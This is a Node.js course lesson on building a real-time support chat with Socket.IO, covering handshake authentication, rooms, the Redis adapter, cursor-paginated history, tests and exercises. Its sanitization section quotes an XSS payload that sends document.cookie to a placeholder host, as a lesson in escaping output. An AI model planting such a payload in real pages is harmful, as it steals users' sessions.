The close of Module 11 said it plainly: we stop building a single application and start building four complete ones. And it is worth clarifying up front that these are not four invented domains or four disconnected exercises: they are satellite products of Escena Viva, the ticket sales platform you have been building since Module 1. The thread does not break, it branches.

This first project is Escena Viva's live support. Lucía buys two tickets for evt-003 (Festival de Jazz de Primavera), the email with codes EV-2026-000417 and EV-2026-000418 never arrives, and instead of writing a message that will be answered in two days she opens a chat from the website. On the other side, an agent sees the conversation drop into a queue and picks it up.

The genuinely new idea here is real-time bidirectional communication. Everything so far follows one pattern: the client asks, the server answers. Here, for the first time, the server needs to speak without anyone having asked.

Contents

  1. The business requirement and why HTTP is not enough
  2. Design decisions: polling, long polling, SSE and WebSocket
  3. What Socket.IO adds and what it costs
  4. Integrating with the existing application
  5. Authenticating the socket during the handshake
  6. The domain event contract
  7. Rooms: conversations and the agent pool
  8. Persisting history and loading it by cursor
  9. The technical challenge: scaling real time across several processes
  10. Presence, validation and rate limiting
  11. Testing and what stays out of scope

  1. The business requirement and why HTTP is not enough

  • An authenticated attendee opens a conversation from any page, and it lands in a queue visible to every connected agent.
  • An agent claims it; from that moment it has exactly one assigned agent.
  • Both sides see each other's messages instantly, without reloading, and see when the other is typing.
  • History is preserved: if Lucía comes back tomorrow, she sees what was said.

All of that is ordinary CRUD except the third point. With the node:http server from M4 and the Express 5 application from M6, the server can only speak when it is spoken to. If the agent replies, there is nothing in the request-response model that carries that message to Lucía's browser on the server's initiative.

  1. Design decisions: polling, long polling, SSE and WebSocket

Technique How it works Latency Server cost Bidirectional When to choose it
Polling The client asks every N seconds N/2 on average High: empty requests No Data that changes every few minutes, few clients
Long polling The server holds the response until there is news Almost immediate Medium No Fallback when WebSocket is blocked
SSE (text/event-stream) An open HTTP connection the server writes events into Immediate Low No: server → client only Notifications, live scores, progress
WebSocket Protocol upgrade to a full-duplex TCP channel Immediate Low Yes Chat, collaboration, games

The reasoning behind each rejection. Polling: with 300 attendees polling every 2 s that is 150 requests per second, nearly all of them returning nothing; worse latency and more spend. Long polling works — it is in fact Socket.IO's internal fallback — but choosing it as the primary mechanism forces you to reimplement reconnection, ordering and batching by hand. SSE is the option most people dismiss too quickly, and it is excellent: if the requirement were only "the attendee sees replies live", it would win, because it is plain HTTP, it traverses proxies, it reconnects on its own with Last-Event-ID and it needs no library; but here the attendee also writes, and with SSE we would have two channels (SSE downstream, POST upstream), two authentication paths and two error paths. The asymmetry does not pay off. WebSocket wins because the domain is symmetric: both ends emit and receive with the same frequency and the same urgency.

  1. What Socket.IO adds and what it costs

Need Raw WebSocket Socket.IO
Reconnecting after a network drop You write it yourself Built in and configurable
Sending to a subset of clients Your own data structure Rooms (socket.join)
Knowing whether the other side got the message Your own protocol Acknowledgements (emit callback)
Networks that block the Upgrade Fails Fallback to long polling
Separating domains on one port Your own routes Namespaces (/support)

The cost, without sugar-coating: Socket.IO is not standard WebSocket, its protocol sits on top. A client opening new WebSocket('wss://...') will understand nothing: the client must be socket.io-client. If tomorrow the requirement became "let an external system connect to our channel", that decision comes back to bite. Here both ends are our own front-end, so the cost is acceptable and the gain is enormous.

npm install socket.io @socket.io/redis-adapter && npm install -D socket.io-client

ioredis has been there since M10; the adapter reuses it.

  1. Integrating with the existing application

Here a decision from six modules ago pays off. Back in M6 you insisted that src/app.js exports createApplication() and never calls listen; the listen lives in src/server.js, which creates the http.Server by hand. That separation is exactly what lets us mount Socket.IO now: it is not mounted on an Express application, it is mounted on an HTTP server.

// src/server.js — extended, not rewritten
const http = require('node:http');
const { createApplication } = require('./app.js');
const { configuration } = require('./config/index.js');
const { mountRealtime } = require('./realtime/socket-server.js');

async function startServer() {
  const httpServer = http.createServer(createApplication());
  // The same HTTP server serves the REST API and the real-time channel.
  const io = await mountRealtime(httpServer);
  httpServer.listen(configuration.port);

  // Graceful shutdown (M11): sockets first, then HTTP.
  // The other way around would leave connections hanging with no warning.
  const shutdown = async () => {
    await io.close();
    httpServer.close(() => process.exit(0));
  };
  process.on('SIGTERM', shutdown);
  return { httpServer, io };
}
module.exports = { startServer };

A single port: the API on /api/v1/... and real time on /socket.io/ coexist without touching the load balancer or the docker compose file from M11. SIGINT is registered exactly like SIGTERM.

  1. Authenticating the socket during the handshake

We reuse verifyAccessToken from src/services/tokens.js (M8) as is: there is no such thing as "socket authentication", there is the same verified identity checked at a different point.

// src/realtime/socket-authentication.js
const { verifyAccessToken } = require('../services/tokens.js');

// Socket.IO middleware: runs once, during the handshake,
// before the socket can emit anything at all.
function authenticateSocket(socket, next) {
  const token = socket.handshake.auth?.token;
  if (!token) return next(new Error('MISSING_CREDENTIALS'));
  try {
    const payload = verifyAccessToken(token);
    // The identity lives on the socket and is available in every event.
    socket.userData = { userId: payload.sub, role: payload.role, name: payload.name };
    return next();
  } catch { return next(new Error('INVALID_CREDENTIALS')); }
}
module.exports = { authenticateSocket };

Why the access token and not the refresh cookie. The cookie would travel in the handshake too if the origin matches, but leaning on it is a bad idea: it must not be used to authorize operations, only to issue new access tokens; in deployments across different domains it does not travel without relaxing SameSite; and handshake.auth is explicit, the client decides which credential it hands over. The problem you discover in production: the access token expires in 15 minutes and the socket lives for hours. The connection does not drop by itself. The healthy fix is to revalidate inside the socket with a one-minute setInterval that verifies the stored token and, if it fails, emits session:expired and disconnects. The client renews over REST with its refresh cookie and reconnects. Leaving the socket alive forever means revoking a user has no effect until they close the browser.

  1. The domain event contract

An event name is as serious a contract as a REST route. Nobody would casually rename POST /api/v1/orders; renaming message:send breaks things just as badly, with the aggravating factor that there is no 404: the client emits into the void and nobody notices. That is why events are documented, versioned through the namespace (/support/v1) and centralized.

// src/realtime/events.js
// Public contract of the channel. Changing a name here is a breaking change.
const EVENTS = {
  // Client → server
  CONVERSATION_OPEN: 'conversation:open', CONVERSATION_CLOSE: 'conversation:close',
  MESSAGE_SEND: 'message:send', AGENT_TYPING: 'agent:typing',
  HISTORY_LOAD: 'history:load',
  // Server → client
  MESSAGE_RECEIVED: 'message:received', CONVERSATION_ASSIGNED: 'conversation:assigned',
  QUEUE_UPDATED: 'queue:updated',
};
module.exports = { EVENTS };

Acknowledgements turn this into something reliable: the last argument of emit can be a function the receiver invokes.

// Client: sends and waits for an acknowledgement with a timeout.
socket.timeout(5000).emit('message:send',
  { conversationId, text, clientMessageId: crypto.randomUUID() },
  (timeoutError, response) => timeoutError
    ? retry(clientMessageId)
    : markDelivered(clientMessageId, response.messageId));

The clientMessageId is the key to a safe retry: it is M10's Idempotency-Key idempotency applied to a socket. If the client retries because the acknowledgement never arrived, the server recognizes the identifier and returns the already-stored message instead of duplicating it.

  1. Rooms: conversations and the agent pool

A room is nothing but a label over a set of sockets. We use three families:

Room Who joins What for
conversation:<id> The owning attendee and the assigned agent Messages and typing
agents Sockets with the organizer or administrator role Queue of unattended conversations
user:<id> Every socket belonging to the same user Personal notices (multiple tabs)
// src/realtime/handlers/conversation.js
const { EVENTS } = require('../events.js');
const { openConversationSchema, messageSchema } = require('../schemas.js');

function registerConversationHandlers({ io, socket, chatRepository }) {
  const { userId, role, name } = socket.userData;
  socket.join(`user:${userId}`);
  if (role === 'organizer' || role === 'administrator') socket.join('agents');

  socket.on(EVENTS.CONVERSATION_OPEN, async (data, ack) => {
    const parsed = openConversationSchema.safeParse(data);
    if (!parsed.success) return ack({ error: { code: 'INVALID_DATA', status: 400 } });
    const conversation = await chatRepository.createConversation({
      attendeeId: userId, attendeeName: name, ...parsed.data,
      status: 'queued', createdAt: new Date().toISOString() });
    socket.join(`conversation:${conversation.id}`);
    io.to('agents').emit(EVENTS.QUEUE_UPDATED, { conversation });
    return ack({ conversation });
  });

  socket.on(EVENTS.MESSAGE_SEND, async (data, ack) => {
    const parsed = messageSchema.safeParse(data);
    if (!parsed.success) return ack({ error: { code: 'INVALID_DATA', status: 400 } });
    const { conversationId, text, clientMessageId } = parsed.data;
    // Authorization: the socket must be in the room. This is the real-time
    // version of M8's insecure direct object reference. Checking socket.rooms
    // is cheap and correct because only the server grants entry to a room.
    if (!socket.rooms.has(`conversation:${conversationId}`)) {
      return ack({ error: { code: 'ACCESS_DENIED', status: 403 } });
    }
    const message = await chatRepository.saveMessage({
      conversationId, authorId: userId, authorName: name, authorRole: role,
      text, clientMessageId, sentAt: new Date().toISOString() });
    io.to(`conversation:${conversationId}`).emit(EVENTS.MESSAGE_RECEIVED, message);
    return ack({ messageId: message.id });
  });
}
module.exports = { registerConversationHandlers };

  1. Persisting history and loading it by cursor

History lives in MongoDB (M7), behind the repository pattern and without leaking Mongoose outside src/repositories/.

// src/repositories/chat-mongo.js — excerpt
// The query is always "this conversation, by date".
messageSchema.index({ conversationId: 1, sentAt: -1 });
// Unique index: blocks the duplicate caused by the retry from section 6.
messageSchema.index({ conversationId: 1, clientMessageId: 1 }, { unique: true });

async function loadHistory({ conversationId, cursor, limit = 30 }) {
  const filter = { conversationId };
  // M10 cursor pagination: no skip, which degrades as volume grows.
  if (cursor) filter.sentAt = { $lt: new Date(cursor) };
  const docs = await MessageModel.find(filter).sort({ sentAt: -1 }).limit(limit + 1).lean();
  const hasMore = docs.length > limit;
  const page = hasMore ? docs.slice(0, limit) : docs;
  return { messages: page.reverse().map(toDomain),
           nextCursor: hasMore ? page[0].sentAt.toISOString() : null };
}

Opening a conversation loads the last 30 messages; as the user scrolls up, the client emits history:load with nextCursor. It is M10's pagination applied backwards in time.

  1. The technical challenge: scaling real time across several processes

In M10 you started up with cluster, and in M11 with PM2 and several Docker replicas. With a stateless REST API that changes nothing. With sockets it matters a great deal, and in the worst possible way: Lucía connects and the load balancer sends her to process A, where her socket lives; Marc, the agent, lands on process B and replies, so B runs io.to('conversation:42').emit(...); but B only knows about its own sockets, and in its table that room contains only Marc. The message is stored in MongoDB and Lucía sees nothing until she reloads. It is the most baffling class of bug there is: "works locally, works sometimes in production".

The cause is that the registry of sockets and rooms is process-local memory. The fix is the Redis adapter: every emission is published on a shared bus and each process delivers to its own sockets.

flowchart LR
  subgraph PA["Process A"]
    L["Lucia's socket"]
  end
  subgraph PB["Process B"]
    M["Marc's socket"]
  end
  R[("Redis pub/sub")]
  M -->|"emit to conversation:42"| PB
  PB -->|"PUBLISH"| R
  R -->|"SUBSCRIBE"| PA
  PA -->|"local delivery"| L
// src/realtime/socket-server.js
const { Server } = require('socket.io');
const { createAdapter } = require('@socket.io/redis-adapter');
const Redis = require('ioredis');
const { authenticateSocket } = require('./socket-authentication.js');
const { registerConversationHandlers } = require('./handlers/conversation.js');

async function mountRealtime(httpServer) {
  const io = new Server(httpServer, {
    cors: { origin: configuration.allowedOrigins, credentials: true },
    maxHttpBufferSize: 100_000,  // the default (1 MB) is absurd for chat
    pingInterval: 25_000, pingTimeout: 20_000 });
  // Two connections: in Redis a subscribed client cannot run
  // other commands, and the adapter needs to publish and subscribe.
  const publisher = new Redis(configuration.redis.url);
  io.adapter(createAdapter(publisher, publisher.duplicate()));

  const support = io.of('/support/v1');
  support.use(authenticateSocket);
  const chatRepository = createChatRepository();
  support.on('connection', (socket) =>
    registerConversationHandlers({ io: support, socket, chatRepository }));
  return io;
}
module.exports = { mountRealtime };

With this, io.to(...) behaves the same with one process as with twelve. Two warnings: the adapter does not persist anything (if Lucía is offline she receives nothing, which is why MongoDB is the source of truth and the socket only the fast channel), and with the long polling fallback enabled you need sticky sessions, because every request from the same client must land on the same process. If you pin transports: ['websocket'], you do not.

  1. Presence, validation and rate limiting

Presence. "Online" looks like a boolean and is not: a laptop lid closing sends no notice (the server finds out when the heartbeat fails, up to 20 s later) and closing one tab out of three does not mean leaving. The rule: a per-user socket counter in Redis.

async function markConnected({ redis, io, userId }) {
  const total = await redis.incr(`presence:${userId}`);
  // Safety net: if the process dies it will never run the decr,
  // and with no expiry the counter would stay inflated forever.
  await redis.expire(`presence:${userId}`, 120);
  if (total === 1) io.emit('presence:changed', { userId, online: true });
}
async function markDisconnected({ redis, io, userId }) {
  if ((await redis.decr(`presence:${userId}`)) > 0) return;
  await redis.del(`presence:${userId}`);
  io.emit('presence:changed', { userId, online: false });
}

Validation. req.validatedData is Express middleware and socket events never go through Express: you have to validate inside every handler with the same zod schemas from M6.

// src/realtime/schemas.js
const messageSchema = z.object({
  conversationId: z.string().uuid(),
  text: z.string().trim().min(1).max(2000),
  clientMessageId: z.string().uuid(),
});
const openConversationSchema = z.object({
  subject: z.string().trim().min(3).max(120),
  eventId: z.string().regex(/^evt-\d{3}$/).optional(),  // 'evt-003'
});
module.exports = { messageSchema, openConversationSchema };

Sanitization. XSS gets in through the chat: if an attendee types <img src=x onerror="fetch('//evil.test?c='+document.cookie)"> and the agent's panel renders it with innerHTML, the attacker runs code inside an organizer's session. The M8 rule still holds: escape on output. The server stores the text as is and the client uses textContent. If the product demands bold text and links, sanitize on the server with an allowlist, as the magazine does in 12-03. And rate limiting: express-rate-limit does not apply here either, so a counter on the socket itself is enough — keep the timestamps of the last 10 seconds and reject if there are already 10.

  1. Testing and what stays out of scope

Here you need a real server listening, because the protocol needs a port. The pattern: bind to port 0, connect real clients and shut everything down in afterEach.

// test/realtime/chat.test.js
describe('live support', () => {
  let server; let sockets; let url;
  beforeEach(async () => {
    server = http.createServer(createApplication());
    sockets = await mountRealtime(server);
    await new Promise((ready) => server.listen(0, ready)); // port 0: pick a free one
    url = `http://localhost:${server.address().port}/support/v1`;
  });
  afterEach(async () => { await sockets.close(); server.close(); });

  const connect = (role, userId) => ioClient(url, { transports: ['websocket'],
    auth: { token: signTestToken({ sub: userId, role, name: userId }) } });

  it('rejects the connection when there is no token', (done) => {
    const client = ioClient(url, { transports: ['websocket'] });
    client.on('connect_error', (error) => {
      expect(error.message).to.equal('MISSING_CREDENTIALS');
      client.close(); done();
    });
  });
  it('does not deliver the conversation to a third party outside the room', (done) => {
    const lucia = connect('attendee', 'usr-lucia');
    const intruder = connect('attendee', 'usr-intruder');
    intruder.on('message:received', () => done(new Error('leak across rooms')));
    lucia.emit('conversation:open', { subject: 'My tickets never arrived' }, (r) =>
      lucia.emit('message:send', { conversationId: r.conversation.id, text: 'Hello',
        clientMessageId: '11111111-1111-4111-8111-111111111111',
      }, () => setTimeout(() => { lucia.close(); intruder.close(); done(); }, 200)));
  });
});

Do not test that Socket.IO delivers messages: they test that themselves. Test your logic: rejection without a token, room isolation, clientMessageId idempotency and the fact that nobody can emit into a conversation they are not part of.

Out of scope Why How you would extend it
Attachments Duplicates the upload work in 12-03 Upload over REST and send the signed URL over the socket
End-to-end encryption Incompatible with moderation and auditing Only if the business accepts never reading conversations
Emailed transcripts Queue work, not real time A BullMQ job (M10) when the conversation closes
First-line chatbot An entire domain of its own A knowledge base consulted before queueing an agent

Common Mistakes and Tips

  • Emitting from a REST controller with no access to io. Do not import it as a global singleton: inject it as a dependency (createOrderController({ repository, notifier })), exactly as in M6. It is testable with Sinon and it does not couple layers.
  • Postponing the Redis adapter until production. Locally, with one process, everything works. Add it on day one.
  • Trusting the userId the client sends. The identity lives in socket.userData, put there by the verified handshake.
  • Not setting maxHttpBufferSize (a 5 MB message would flatten memory) and recreating Redis connections per socket: two for the whole process, created once.
  • Tip: log every event with pino (M11) including userId and conversationId. A real-time channel with no logs is impossible to debug.

Exercises

  1. Agent queue with claiming. Implement conversation:claim: only one agent may claim a queued conversation; if two try at the same time, the second one receives { error: { code: 'STATE_CONFLICT', status: 409 } }. Emit to the agents room so it disappears from everyone else's queue.

  2. Typing indicator with expiry. Implement agent:typing so the indicator switches itself off if no events arrive for 3 seconds, without emitting one per keystroke.

  3. Idempotent retry test. Send the same clientMessageId twice and verify that history contains a single message and that the second acknowledgement returns the same messageId.

Solutions

1. Agent queue with claiming

socket.on('conversation:claim', async (data, ack) => {
  const { role, userId, name } = socket.userData;
  if (role !== 'organizer' && role !== 'administrator') {
    return ack({ error: { code: 'ACCESS_DENIED', status: 403 } });
  }
  // Atomic conditional update: it only changes if it is still queued.
  // Same idea as the M7 locking: the condition travels inside the query.
  const conversation = await chatRepository.assignIfQueued({
    conversationId: data.conversationId, agentId: userId, agentName: name });
  if (!conversation) return ack({ error: { code: 'STATE_CONFLICT', status: 409,
    message: 'The conversation was already claimed by another agent' } });
  socket.join(`conversation:${conversation.id}`);
  io.to('agents').emit('queue:updated', { conversationId: conversation.id, removed: true });
  io.to(`conversation:${conversation.id}`).emit('conversation:assigned', conversation);
  return ack({ conversation });
});

The repository uses findOneAndUpdate({ _id, status: 'queued' }, { $set: { status: 'assigned', agentId } }, { new: true }): if another agent got there first, the filter does not match and it returns null. No transactions and no race conditions.

2. Typing indicator with expiry

// Server: relay to the room except the sender, with an expiry stamp.
socket.on('agent:typing', ({ conversationId }) => {
  if (!socket.rooms.has(`conversation:${conversationId}`)) return;
  // socket.to (not io.to) excludes the sender, which is what we want here.
  socket.to(`conversation:${conversationId}`).emit('agent:typing',
    { userId: socket.userData.userId, until: Date.now() + 3000 });
});

// Client: throttles to one emission every 2 s and switches off on a timer.
socket.on('agent:typing', ({ userId, until }) => {
  showIndicator(userId);
  clearTimeout(timers[userId]);
  timers[userId] = setTimeout(() => hideIndicator(userId), until - Date.now());
});

On the sending side, input does not emit on every keystroke: it stores the timestamp of the last emission and only emits again after 2 seconds have passed. Traffic stays constant no matter how fast someone types.

3. Idempotent retry test

it('does not duplicate the message when the client retries', async () => {
  const lucia = connect('attendee', 'usr-lucia');
  const { conversation } = await emitAndWait(lucia, 'conversation:open',
    { subject: 'Question about evt-001' });
  const payload = { conversationId: conversation.id, text: 'Hello',
                    clientMessageId: '22222222-2222-4222-8222-222222222222' };
  const first = await emitAndWait(lucia, 'message:send', payload);
  const second = await emitAndWait(lucia, 'message:send', payload);
  expect(second.messageId).to.equal(first.messageId);
  const { messages } = await emitAndWait(lucia, 'history:load',
    { conversationId: conversation.id });
  expect(messages).to.have.lengthOf(1);
  lucia.close();
});

In the repository, saveMessage catches the duplicate key error (error.code === 11000) raised by the unique index from section 8 and returns the existing document. Idempotency rests on the database, not on memory: that way it works with several processes too.

Conclusion

You have built Escena Viva's live support and, with it, the one thing missing from your mental model of a server: that it can speak first. You chose WebSocket over SSE because the domain is symmetric, you accepted the cost of Socket.IO in exchange for reconnection, rooms and acknowledgements, and you mounted the channel on the very same http.Server you already had, thanks to an M6 decision that only today revealed its purpose.

The challenge was never opening a socket: it was discovering that real time and horizontal scaling are natural enemies, understanding why the message vanishes between processes and solving it with the Redis adapter. That pattern — local state that stops being valid the moment there is more than one process — will show up every single time you scale something.

In the next lesson we build Escena Viva's merchandise store, where the element that rewrites every engineering rule appears: real money, with a payment gateway, signed webhooks and a state machine that tolerates no mistakes.

Node.js Course: From Beginner to Advanced

Module 1: Introduction to Node.js

Module 2: Core Concepts

Module 3: File System and I/O

Module 4: HTTP and Web Servers

Module 5: NPM and Package Management

Module 6: The Express.js Framework

Module 7: Databases and ORMs

Module 8: Authentication and Authorization

Module 9: Testing and Debugging

Module 10: Advanced Topics

Module 11: Deployment and DevOps

Module 12: Real-World Projects

© Copyright 2026. All rights reserved